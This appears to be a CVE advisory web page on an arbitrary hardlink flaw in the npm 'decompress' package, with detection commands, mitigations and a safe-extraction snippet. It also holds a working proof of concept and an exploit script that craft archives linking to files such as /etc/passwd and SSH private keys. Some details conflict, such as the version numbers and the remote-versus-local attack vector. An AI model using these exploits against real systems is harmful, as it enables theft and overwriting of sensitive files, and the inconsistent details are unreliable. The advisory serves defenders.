decompress Package Arbitrary Hardlink Creation Vulnerability (CVE-2026-39243) – Medium -DC-Jul2026-905

Listen to this Post

– How CVE-2026-39243 Works

CVE-2026-39243 is a medium-severity vulnerability affecting the `decompress` npm package versions prior to 4.2.2. The package is widely used for extracting archive formats such as tar, tar.gz, tar.bz2, and zip. The flaw resides in how the package processes hardlink entries during archive extraction, allowing an attacker to create arbitrary hardlinks that point to any file on the same filesystem.
When `decompress` encounters a hardlink entry within an archive, it identifies the entry by checking type === 'link'. The `x.linkname` field, which contains the target path of the hardlink, is taken directly from the archive metadata. At index.js line 113, the package calls `fs.link(x.linkname, dest)` without performing any validation or sanitization on the `linkname` value. This means an attacker can craft a malicious archive where `linkname` is set to an absolute path, such as /etc/passwd, /tmp/secret.txt, or any other file on the target system’s filesystem.
During extraction, the package creates a hardlink inside the output directory that shares the same inode as the target file specified in linkname. Because hardlinks are directory entries that point directly to the underlying file data, any read or write operation performed on the extracted hardlink will actually read from or write to the original target file. This enables two primary attack vectors: information disclosure (reading sensitive files) and file corruption (overwriting critical system or application files).
The vulnerability is classified under CWE-59: Improper Link Resolution Before File Access (‘Link Following’). The attack requires no authentication and can be triggered remotely by providing a malicious archive to an application that uses the vulnerable `decompress` library. However, the attack has some limitations: hardlinks cannot cross filesystem boundaries and cannot target directories—only regular files are affected.
The issue was reported by Daniel Pua (devploit) and is tracked on GitHub under issue 113. As of the latest information, no official fix has been released, making all versions up to and including 4.2.1 vulnerable. The CVSS v3.1 base score is 5.5 (MEDIUM) with the vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N, indicating local attack vector, low complexity, no privileges required, but user interaction is needed.

DailyCVE Form

Platform: Node.js / npm
Version: <= 4.2.1
Vulnerability: Arbitrary hardlink creation
Severity: Medium (5.5)
Date: 2026-07-09

Prediction: 2026-08-15

What Undercode Say – Analytics & Commands

The following analytics and commands can be used to assess exposure, detect exploitation attempts, and simulate the vulnerability in a controlled environment.

Detection (Package Version Check):

npm list decompress
If output shows version <= 4.2.1, the system is vulnerable.

Filesystem Audit (Find Suspicious Hardlinks):

find /path/to/extraction/dir -type f -links +1 -ls
Lists files with multiple hardlinks; investigate any unexpected links.

Monitor Hardlink Creation (Linux Audit):

auditctl -a always,exit -F arch=b64 -S link -S linkat -k hardlink_creation
Then check logs: ausearch -k hardlink_creation

Simulate the Vulnerability (PoC – Node.js):

const decompress = require('decompress');
const tar = require('tar-stream');
const fs = require('fs');
// Create a target file to be exposed
fs.writeFileSync('/tmp/secret.txt', 'TOP SECRET CONTENT');
// Build a malicious tar archive with a hardlink entry
const pack = tar.pack();
pack.entry({ name: 'leak', type: 'link', linkname: '/tmp/secret.txt' });
pack.finalize();
const chunks = [];
pack.on('data', c => chunks.push(c));
pack.on('end', async () => {
await decompress(Buffer.concat(chunks), '/tmp/out');
// Read the secret through the hardlink
console.log(fs.readFileSync('/tmp/out/leak', 'utf8')); // -> TOP SECRET CONTENT
});

Exploit – Crafting a Malicious Archive

An attacker can create a tar or zip archive containing a hardlink entry with an absolute `linkname` pointing to a target file. Below is a step-by-step breakdown of the exploit process:
1. Identify a target file on the victim’s filesystem (e.g., /etc/passwd, /app/config.json, /home/user/.ssh/id_rsa).
2. Craft an archive using tools like `tar` or a custom script. For a tar archive, the hardlink entry is created with the `–hard-dereference` or by manually setting the linkname.
3. Deliver the archive to the victim application (e.g., via file upload, email attachment, or network download).

4. Trigger extraction using the vulnerable `decompress` library.

  1. Access the extracted hardlink – the file appears in the output directory but points to the target. Reading or writing this file affects the original target.

Example using GNU tar (command-line):

Create a hardlink entry pointing to /etc/passwd inside a tar archive
echo "dummy" > dummy.txt
tar -cf malicious.tar --hard-dereference --transform='s/./leak/' /etc/passwd
Note: Actual exploitation requires crafting the tar header manually or using a script.

Custom Node.js Exploit Script:

const tar = require('tar-stream');
const fs = require('fs');
const pack = tar.pack();
pack.entry({ name: 'config_leak', type: 'link', linkname: '/app/config.json' });
pack.entry({ name: 'normal_file', type: 'file', content: 'innocent' });
pack.finalize();
const writeStream = fs.createWriteStream('exploit.tar');
pack.pipe(writeStream);

Once extracted, the attacker can read sensitive data or overwrite critical files by simply writing to the extracted hardlink.

Protection – Mitigating CVE-2026-39243

Until an official patch is released, the following protections are recommended:
1. Upgrade (if available): Monitor the `decompress` repository for a patched version (>4.2.2) and update immediately.
2. Input Validation: Before extraction, validate all link targets. Reject any entry where `linkname` is an absolute path or contains `..` sequences.
3. Use a Safe Wrapper: Wrap the extraction routine with a validation layer that resolves the target path and ensures it stays within the output directory with a proper path-separator boundary check.
4. Filesystem Restrictions: Extract untrusted archives in a dedicated directory on a separate filesystem (e.g., a tmpfs mount) to prevent hardlinks from crossing to sensitive files.
5. Disable Hardlink Creation: If possible, use a custom extraction routine that ignores or blocks hardlink entries altogether.

Example Safe Extraction Snippet:

const path = require('path');
const fs = require('fs');
function safeExtract(entry, outputDir) {
if (entry.type === 'link') {
const resolved = path.resolve(outputDir, entry.linkname);
if (!resolved.startsWith(path.resolve(outputDir) + path.sep)) {
throw new Error('Hardlink target outside output directory');
}
}
// Proceed with extraction
}

Workaround: Use an alternative extraction library that implements proper path validation, such as `tar` with the `{ preservePaths: false }` option or `adm-zip` with built-in sanitization.

Impact – What an Attacker Can Achieve

  • Confidentiality Breach (High): An attacker can read any file on the same filesystem that the extraction process has access to. This includes configuration files, private keys, source code, database credentials, and user data.
  • Integrity Compromise: By writing to the extracted hardlink, an attacker can overwrite the original target file, leading to data corruption, application misconfiguration, or denial of service.
  • Lateral Movement: If the target file is a critical system binary or script, overwriting it could lead to privilege escalation or persistent backdoors.
  • Widespread Applicability: Since `decompress` is used in many Node.js applications (build tools, CLI utilities, file upload handlers), the attack surface is broad. Any application that extracts user-supplied archives is potentially vulnerable.
  • No Authentication Required: The attack can be initiated remotely by submitting a crafted archive, making it highly accessible to external threat actors.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top